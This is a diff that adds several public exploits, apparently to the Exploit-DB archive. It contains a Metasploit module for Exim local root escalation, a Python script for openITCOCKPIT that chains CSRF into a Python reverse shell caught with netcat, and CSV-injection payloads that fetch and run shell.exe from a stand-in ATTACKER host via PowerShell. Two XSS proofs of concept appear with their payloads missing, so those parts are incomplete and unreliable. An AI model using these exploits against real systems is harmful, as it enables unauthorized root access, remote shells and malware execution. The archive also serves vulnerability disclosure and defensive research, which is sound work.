diff --git a/exploits/linux/local/47307.rb b/exploits/linux/local/47307.rb new file mode 100755 index 000000000..a116ab597 --- /dev/null +++ b/exploits/linux/local/47307.rb @@ -0,0 +1,261 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'expect' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation', + 'Description' => %q{ + This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). + Improper validation of recipient address in deliver_message() + function in /src/deliver.c may lead to command execution with root privileges + (CVE-2019-10149). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Qualys', # Discovery and PoC (@qualys) + 'Dennis Herrmann', # Working exploit (@dhn) + 'Marco Ivaldi', # Working exploit (@0xdea) + 'Guillaume André' # Metasploit module (@yaumn_) + ], + 'DisclosureDate' => '2019-06-05', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ + 'Exim 4.87 - 4.91', + lower_version: Gem::Version.new('4.87'), + upper_version: Gem::Version.new('4.91') + ] + ], + 'DefaultOptions' => + { + 'PrependSetgid' => true, + 'PrependSetuid' => true + }, + 'References' => + [ + [ 'CVE', '2019-10149' ], + [ 'EDB', '46996' ], + [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ] + ] + )) + + register_options( + [ + OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ]) + ]) + + register_advanced_options( + [ + OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]), + OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def base_dir + datastore['WritableDir'].to_s + end + + def encode_command(cmd) + '\x' + cmd.unpack('H2' * cmd.length).join('\x') + end + + def open_tcp_connection + socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client) + params = Rex::Socket::Parameters.new({ + 'PeerHost' => '127.0.0.1', + 'PeerPort' => datastore['EXIMPORT'] + }) + begin + socket = socket_subsystem.create_tcp_client_channel(params) + rescue => e + vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\ + "are you sure exim is listening on this port? (see EXIMPORT)") + raise e + end + return socket_subsystem, socket + end + + def inject_payload(payload) + if session.type == 'meterpreter' + socket_subsystem, socket = open_tcp_connection + + tcp_conversation = { + nil => /220/, + 'helo localhost' => /250/, + "MAIL FROM:<>" => /250/, + "RCPT TO:<${run{#{payload}}}@localhost>" => /250/, + 'DATA' => /354/, + 'Received:' => nil, + '.' => /250/ + } + + begin + tcp_conversation.each do |line, pattern| + Timeout.timeout(datastore['SendExpectTimeout']) do + if line + if line == 'Received:' + for i in (1..31) + socket.puts("#{line} #{i}\n") + end + else + socket.puts("#{line}\n") + end + end + if pattern + socket.expect(pattern) + end + end + end + rescue Rex::ConnectionError => e + fail_with(Failure::Unreachable, e.message) + rescue Timeout::Error + fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out') + ensure + socket.puts("QUIT\n") + socket.close + socket_subsystem.shutdown + end + else + unless cmd_exec("/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' "\ + "&& echo true").chomp.to_s == 'true' + fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed") + end + + bash_script = %| + #!/bin/bash + + exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']} + read -u 3 && echo $REPLY + echo "helo localhost" >&3 + read -u 3 && echo $REPLY + echo "mail from:<>" >&3 + read -u 3 && echo $REPLY + echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3 + read -u 3 && echo $REPLY + echo "data" >&3 + read -u 3 && echo $REPLY + for i in $(seq 1 30); do + echo 'Received: $i' >&3 + done + echo "." >&3 + read -u 3 && echo $REPLY + echo "quit" >&3 + read -u 3 && echo $REPLY + | + + @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) + write_file(@bash_script_path, bash_script) + register_file_for_cleanup(@bash_script_path) + chmod(@bash_script_path) + cmd_exec("/bin/bash -c \"#{@bash_script_path}\"") + end + + print_status('Payload sent, wait a few seconds...') + Rex.sleep(5) + end + + def check_for_bash + unless command_exists?('/bin/bash') + fail_with(Failure::NotFound, 'bash not found') + end + end + + def on_new_session(session) + super + + if session.type == 'meterpreter' + session.core.use('stdapi') unless session.ext.aliases.include?('stdapi') + session.fs.file.rm(@payload_path) + else + session.shell_command_token("rm -f #{@payload_path}") + end + end + + def check + if session.type == 'meterpreter' + begin + socket_subsystem, socket = open_tcp_connection + rescue + return CheckCode::Safe + end + res = socket.gets + socket.close + socket_subsystem.shutdown + else + check_for_bash + res = cmd_exec("/bin/bash -c 'exec 3= target[:lower_version] && version <= target[:upper_version] + return CheckCode::Appears + else + return CheckCode::Safe + end + end + + CheckCode::Unknown + end + + def exploit + if is_root? + unless datastore['ForceExploit'] + fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.') + end + end + + unless writable?(base_dir) + fail_with(Failure::BadConfig, "#{base_dir} is not writable") + end + + if nosuid?(base_dir) + fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid") + end + + unless datastore['PrependSetuid'] && datastore['PrependSetgid'] + fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \ + 'to get root privileges.') + end + + if session.type == 'shell' + check_for_bash + end + + @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) + write_file(@payload_path, payload.encoded_exe) + register_file_for_cleanup(@payload_path) + inject_payload(encode_command("/bin/sh -c 'chown root #{@payload_path};"\ + "chmod 4755 #{@payload_path}'")) + + unless setuid?(@payload_path) + fail_with(Failure::Unknown, "Couldn't escalate privileges") + end + + cmd_exec("#{@payload_path} & echo ") + end +end \ No newline at end of file diff --git a/exploits/linux/remote/47230.rb b/exploits/linux/remote/47230.rb index 800821c83..f784eb136 100755 --- a/exploits/linux/remote/47230.rb +++ b/exploits/linux/remote/47230.rb @@ -11,14 +11,19 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'Webmin 1.920 Unauthenticated RCE', - 'Description' => %q( - This module exploits an arbitrary command execution vulnerability in Webmin - 1.920 and prior versions. If the password change module is turned on, the unathenticated user - can execute arbitrary commands with root privileges. - - /////// This 0day has been published at DEFCON-AppSec Village. /////// + 'Description' => %q{ + This module exploits a backdoor in Webmin versions 1.890 through 1.920. + Only the SourceForge downloads were backdoored, but they are listed as + official downloads on the project's site. - ), + Unknown attacker(s) inserted Perl qx statements into the build server's + source code on two separate occasions: once in April 2018, introducing + the backdoor in the 1.890 release, and in July 2018, reintroducing the + backdoor in releases 1.900 through 1.920. + + Only version 1.890 is exploitable in the default install. Later affected + versions require the expired password changing feature to be enabled. + }, 'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus ], diff --git a/exploits/php/webapps/47303.txt b/exploits/php/webapps/47303.txt new file mode 100644 index 000000000..3470edb74 --- /dev/null +++ b/exploits/php/webapps/47303.txt @@ -0,0 +1,48 @@ +# Exploit Title: Wordpress Plugin Import Export WordPress Users <= 1.3.1 - CSV Injection +# Exploit Author: Javier Olmedo +# Contact: @jjavierolmedo +# Website: https://sidertia.com +# Date: 2018-08-22 +# Google Dork: inurl:"/wp-content/plugins/users-customers-import-export-for-wp-woocommerce" +# Vendor: WebToffee +# Software Link: https://downloads.wordpress.org/plugin/users-customers-import-export-for-wp-woocommerce.1.3.1.zip +# Affected Version: 1.3.1 and before +# Active installations: +20,000 +# Patched Version: update to 1.3.2 version +# Category: Web Application +# Platform: PHP +# Tested on: Win10x64 +# CVE: 2019-15092 +# References: +# https://hackpuntes.com/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/ +# https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787 + +# 1. Technical Description +# Wordpress Plugin Import Export WordPress Users version 1.3.1. and before are affected by Remote Code +# Execution through the CSV injection vulnerability. This allows any application user to inject commands +# as part of the fields of his profile and these commands are executed when a user with greater privilege +# exports the data in CSV and opens that file on his machine. + +# 2. Vulnerable code +# The function do_export() from WF_CustomerImpExpCsv_Exporter class does not check if fields beggings +# with (=, +, -, @) characters so the fields name, surname, alias or display_name are vulnerable to CSV Injection. + +# 3. Proof Of Concept (PoC) +# 3.1 Login with subscriber user and change the fields First name, Surname and Alias with payloads. +# 3.2 Login with a high privileges user and export all users to CSV. +# 3.3 When the user with high privileges logs in to the application, export data in CSV and opens the +# generated file, the command is executed and the shell will run open on the machine. + +# 4. Payloads +=cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 ++cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 +-cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 +@cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 + +# 5. Timeline +# 15, august 2019 - [RESEARCHER] Discover +# 15, august 2019 - [RESEARCHER] Report to Webtoffee support +# 16, august 2019 - [DEVELOPER] More information request +# 16, august 2019 - [RESEARCHER] Detailed vulnerability report +# 19, august 2019 - [DEVELOPER] Unrecognized vulnerability +# 22, august 2019 - [RESEARCHER] Public disclosure \ No newline at end of file diff --git a/exploits/php/webapps/47304.txt b/exploits/php/webapps/47304.txt new file mode 100644 index 000000000..af6848a7a --- /dev/null +++ b/exploits/php/webapps/47304.txt @@ -0,0 +1,27 @@ +# Exploit Title: UserPro <= 4.9.32 Reflected XSS +# Google Dork: intitle:"Index of" intitle:"UserPro" -uploads +# Date: 25 August 2019 +# Exploit Author: Damian Ebelties (https://zerodays.lol/) +# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681 +# Version: <= 4.9.32 +# Tested on: Ubuntu 18.04.1 +# CVE: CVE-2019-14470 + +The WordPress plug-in 'UserPro' uses a Instagram library (Instagram PHP API V2 by cosenary) that +is vulnerable for Reflected Cross-Site Scripting (XSS). + +There is more vulnerable code in 'UserPro' core, might release that later. + +As of today (25 August 2019) this issue is unfixed. + +Vulnerable code: (success.php on line 36) + + if (isset($_GET['error'])) { + echo 'An error occurred: ' . $_GET['error_description']; + } + + > https://github.com/cosenary/Instagram-PHP-API/blob/master/example/success.php#L36 + +Proof-of-Concept: + + https://domain.tld/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description= \ No newline at end of file diff --git a/exploits/php/webapps/47305.py b/exploits/php/webapps/47305.py new file mode 100755 index 000000000..ec64d4be5 --- /dev/null +++ b/exploits/php/webapps/47305.py @@ -0,0 +1,110 @@ +# Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE +# Google Dork: N/A +# Date: 26-08-2019 +# Exploit Author: Julian Rittweger +# Vendor Homepage: https://openitcockpit.io/ +# Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2 +# Fixed in: 3.7.1 | https://github.com/it-novum/openITCOCKPIT/releases +# Version: 3.6.1-2 +# Tested on: Debian 9 +# CVE : 2019-10227 +# Exploit Requirements: pip3 install bs4 requests && apt install netcat + +#!/usr/bin/env python +import requests, urllib3, os +import http.server, socketserver + +from bs4 import BeautifulSoup as bs +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +print(""" +-- + openITCOCKPIT v.3.6.1-2 + [CSRF 2 RCE] +-- +""") + +# Setup values +RHOST = input('[x] Enter IP of remote machine: ') +LHOST = input('[x] Enter IP of local machine: ') +RPORT = int(input('[x] Enter local port (back-connection): ')) +LPORT = int(input('[x] Enter local port (payload-hosting): ')) + +print('[-] Generating CSRF form using the following credentials: "hacked@oicp.app - letmein1337" ..') + +# Generate file which serves CSRF payload +pl = open('./index.html', 'w') +# Register HTTP server +handler = http.server.SimpleHTTPRequestHandler + +csrf = """ + +
+ + + + + + + + + + + +
+ +""" + +pl.write(csrf) +pl.close() +httpd = socketserver.TCPServer(("", LPORT), handler) + +# Start HTTP server, quit on keyboard interrupt +try: + print('[!] Serving payload at port : ' + str(LPORT) + ', press STRG+C if you registered requests!') + print('[!] Send this URL to a logged-in administrator: http://' + LHOST + ':' + str(LPORT)) + httpd.serve_forever() +except KeyboardInterrupt: + httpd.socket.close() + print('\n[-] Starting exploitation ..') + +print('[-] Logging in ..') +# Proceed login with generated credentials +c = requests.post('https://' + RHOST + '/login/login', data={'_method' : 'POST', 'data[LoginUser][username]' : 'hacked@oicp.app', 'data[LoginUser][password]' : 'letmein1337'}, verify=False, allow_redirects=False).headers['Set-Cookie'] +print('[!] Received cookie: ' + c.split(';')[0]) +print('[-] Creating reverse-shell as macro ..') +# Insert a new macro identified as $USER99$ +makro = {'_method' : 'POST', 'data[0][Macro][id]' : 1, 'data[0][Macro][name]' : '$USER1$', 'data[0][Macro][value]' : '/opt/openitc/nagios/libexec', 'data[0][Macro][description]' : 'default', 'data[0][Macro][password]' : 0, 'data[1][Macro][id]' : 2, 'data[1][Macro][name]' : '$USER99$', 'data[1][Macro][value]' : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(RPORT) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", 'data[1][Macro][password]' : 1} +requests.post('https://' + RHOST + '/macros', data=makro, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}) +print('[-] Inserting macro as command ..') +# Register a new command using the inserted macro +requests.post('https://' + RHOST + '/commands/add/_controller:commands/_action:hostchecks', data={'_method' : 'POST', 'data[Command][command_type]' : 2, 'data[Command][name]' : 'pwned', 'data[Command][command_line]' : '$USER99$'}, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}) +h = bs(requests.get('https://' + RHOST + '/commands/hostchecks', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}).text, 'html.parser') +ids = [] + +# Fetch current commands by ID +for i in h.find_all('form', {'action': lambda x : x.startswith('/commands/delete')}): + ids.append(i.get('action').split('/')[-1]) + +print('[!] ID of command identified as: ' + str(ids[-1])) +print('[-] Updating default host ..') + +# Update host, using the new malicious "hostcheck" command +sett = {'_method':'POST','data[Host][id]':'1','data[Host][container_id]':'1','data[Host][shared_container]':'','data[Host][hosttemplate_id]':'1','data[Host][name]':'localhost','data[Host][description]':'default+host','data[Host][address]':'127.0.0.1','data[Host][Hostgroup]':'','data[Host][Parenthost]':'','data[Host][notes]':'','data[Host][host_url]':'','data[Host][priority]':'1','data[Host][tags]':'','data[Host][notify_period_id]':'1','data[Host][notification_interval]':'0','data[Host][notification_interval]':'0','data[Host][notify_on_recovery]':'0','data[Host][notify_on_recovery]':'1','data[Host][notify_on_down]':'0','data[Host][notify_on_unreachable]':'0','data[Host][notify_on_unreachable]':'1','data[Host][notify_on_flapping]':'0','data[Host][notify_on_downtime]':'0','data[Host][active_checks_enabled]':'0','data[Host][active_checks_enabled]':'1','data[Host][Contact]':'','data[Host][Contact][]':'1','data[Host][Contactgroup]':'','data[Host][command_id]':ids[-1],'data[Host][check_period_id]':'1','data[Host][max_check_attempts]':'3','data[Host][check_interval]':'120','data[Host][check_interval]':'120','data[Host][retry_interval]':'120','data[Host][retry_interval]':'120','data[Host][flap_detection_enabled]':'0','data[Host][flap_detection_on_up]':'0','data[Host][flap_detection_on_down]':'0', 'data[Host][flap_detection_on_unreachable]' : 0} +requests.post('https://' + RHOST + '/hosts/edit/1/_controller:hosts/_action:browser/_id:1/', data=sett, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}) + +# Refresh host configuration +print('[-] Refreshing host configuration ..') +requests.get('https://' + RHOST + '/exports/launchExport/0.json', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}, headers={'X-Requested-With' : 'XMLHttpRequest'}) + +print('[!] Done! Enjoy your shell (popup in approx. 30s): ') + +# We did it! +os.system('nc -lvp ' + str(RPORT)) \ No newline at end of file diff --git a/exploits/windows/webapps/47302.txt b/exploits/windows/webapps/47302.txt new file mode 100644 index 000000000..a5ed01e71 --- /dev/null +++ b/exploits/windows/webapps/47302.txt @@ -0,0 +1,23 @@ +# Exploit Title: LSoft ListServ < 16.5 - Cross-Site Scripting (XSS) +# Google Dork: intitle:LISTSERV 16.5 +# Date: 08-21-2019 +# Exploit Author: MTK (http://mtk911.cf/) +# Vendor Homepage: http://www.lsoft.com/ +# Softwae Link: http://www.lsoft.com/products/listserv.asp +# Version: Older than Ver 16.5-2018a +# Tested on: IIS 8.5/10.0 - Firefox/Windows +# CVE : CVE-2019-15501 + +# Software description: +The term Listserv has been used to refer to electronic mailing list software applications in general, +but is more properly applied to a few early instances of such software, which allows a sender to send one +email to the list, and then transparently sends it on to the addresses of the subscribers to the list. + +# POC + +1. http://127.0.0.1/scripts/wa.exe?OK= +2. http://127.0.0.1/scripts/wa.exe?OK= + +# References: +1. http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf +2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 026eddfa1..f4978b276 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10661,6 +10661,7 @@ id,file,description,date,author,type,platform,port 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows, 47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows, 47258,exploits/windows/local/47258.txt,"Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities",2019-08-15,"Google Security Research",local,windows, +47307,exploits/linux/local/47307.rb,"Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)",2019-08-26,Metasploit,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -41658,3 +41659,7 @@ id,file,description,date,author,type,platform,port 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80 47295,exploits/php/webapps/47295.html,"WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php, 47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple, +47302,exploits/windows/webapps/47302.txt,"LSoft ListServ < 16.5-2018a - Cross-Site Scripting",2019-08-26,MTK,webapps,windows, +47303,exploits/php/webapps/47303.txt,"WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection",2019-08-26,"Javier Olmedo",webapps,php,80 +47304,exploits/php/webapps/47304.txt,"WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting",2019-08-26,"Damian Ebelties",webapps,php,80 +47305,exploits/php/webapps/47305.py,"openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery",2019-08-26,"Julian Rittweger",webapps,php,80